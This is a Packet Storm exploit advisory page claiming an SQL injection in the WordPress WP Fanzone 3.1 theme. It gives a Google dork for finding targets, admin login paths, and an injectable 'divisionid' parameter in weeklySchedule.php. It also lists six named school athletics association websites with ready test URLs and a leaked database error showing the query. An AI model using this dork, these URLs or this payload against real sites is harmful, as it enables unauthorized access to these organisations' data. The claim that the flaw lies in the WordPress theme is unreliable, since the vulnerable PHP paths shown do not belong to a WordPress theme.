exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

WordPress WP Fanzone 3.1 SQL Injection

WordPress WP Fanzone 3.1 SQL Injection
Posted Jan 20, 2020
Authored by KingSkrupellos

WordPress WP Fanzone theme version 3.1 suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection
SHA-256 | d45e3f26a0a71679fc1154d54620182aa1ba5a2df9ee28abfa4827e6d7ec98a6

WordPress WP Fanzone 3.1 SQL Injection

Change Mirror Download
###################################################################

# Exploit Title : Built with WordPress and WP FanZone Themes 3.1 SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 20/01/2020
# Vendor Homepage : wordpress.org - wpdevshed.com/wp-fanzone-theme/
# Software Download Link : downloads.wordpress.org/theme/wp-fanzone.3.1.zip
# Software Version : 3.1
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dork : Built with WordPress and WP FanZone site:ca
# Vulnerability Type : CWE-89 [ Improper Neutralization of
Special Elements used in an SQL Command ('SQL Injection') ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

###################################################################

# Description About Software :
****************************
WP Fan Zone was designed orginally with sports fans and bloggers in mind,
but it could easily be used for any type of blog or magazine style site that wants to
feature images and content. It is fully responsive, comes with two main menus, and
widget areas for all page types. It also has customization options for social media
links, color scheme and author bios, plus a simple banner widget for putting ads in the header.

###################################################################

# Impact :
***********
Built with WordPress and WP FanZone 3.1 is prone to an SQL-injection vulnerability because
it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or
modify data, or exploit latent vulnerabilities in the underlying database.
A remote attacker can send a specially crafted request to the vulnerable application and
execute arbitrary SQL commands in application`s database. Further exploitation of this
vulnerability may result in unauthorized data manipulation.
An attacker can exploit this issue using a browser or with any SQL Injector Tool.

###################################################################

# Administrator Login Path :
***************************
/admin/adminLogin.php
/admin/convenorLogin.php
/admin/coachLogin.php
/index.php/department-heads/
/wp-login.php

# SQL Injection Exploit :
**********************
/weeklySchedule.php?schoolid=[ID-NUMBER]&date=ALL&leagueid=[ID-NUMBER]&divisionid=[SQL Injection]

###################################################################

# Example Vulnerable Sites :
*************************
LOSSA – Lake Ontario Secondary School Athletics

[+] lossa.on.ca/weeklySchedule.php?schoolid=17&date=ALL&leagueid=16&divisionid=1%27

LKSSAA – Lambton Kent Secondary School Athletic Association

[+] lkssaa.ca/weeklySchedule.php?schoolid=17&date=ALL&leagueid=16&divisionid=1%27

Sudbury District Secondary Schools' Athletic Association

[+] sdssaa.ca/weeklySchedule.php?schoolid=17&date=ALL&leagueid=16&divisionid=1%27

BCSSAA – Brant County Secondary Schools' Athletic Association

[+] bcssaa.ca/weeklySchedule.php?schoolid=17&date=ALL&leagueid=16&divisionid=1%27

Huron Perth Athletic Association

[+] hpathletics.ca/weeklySchedule.php?schoolid=17&date=ALL&leagueid=16&divisionid=1%27

NRHSAA – Niagara Region High School Athletic Association

[+] nrhsaa.ca/weeklySchedule.php?schoolid=17&date=ALL&leagueid=16&divisionid=1%27

###################################################################

# Example SQL Database Error :
****************************
Failed Query: SELECT gameid, hometeamid, homessid, awayteamid, awayssid, dateandtime,
specialnotes, DATE_FORMAT(dateandtime, '%h:%i %p') AS gametime, DATE_FORMAT
(dateandtime, '%W, %M %e, %Y') as formattedDate, substring(dateandtime, 1, 10) AS gdate,
scoreupdated, hometeamscore, hometeamstats, awayteamscore, awayteamstats,
schedule_results.leagueid AS leagueid, sportName, levelName, genderName, leagueName,
locationName, locations.locationid AS locationid FROM schedule_results, sports, leagues,
locations, levels, genders WHERE sports.sportid = leagues.sportid AND schedule_results.
locationid = locations.locationid AND levels.levelID = leagues.levelID AND genders.genderID =
leagues.genderID AND scheduleLive = 1 AND YEARWEEK(dateandtime) = '202003' AND
schedule_results.leagueid = leagues.leagueid AND (hometeamid = 17 OR awayteamid = 17)
AND schedule_results.leagueid = '16' AND (hometeamid IN (SELECT schoolid FROM
standings WHERE leagueid = 16 AND divisionid = 1\') OR awayteamid IN (SELECT schoolid
FROM standings WHERE leagueid = 16 AND divisionid = 1\')) ORDER BY dateandtime,
leagueid<br>SQL Error: You have an error in your SQL syntax; check the manual that corresponds
to your MariaDB server version for the right syntax to use near '\') OR awayteamid IN
(SELECT schoolid FROM standings WHERE leagueid = 16 AND div' at line 1

###################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

###################################################################
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close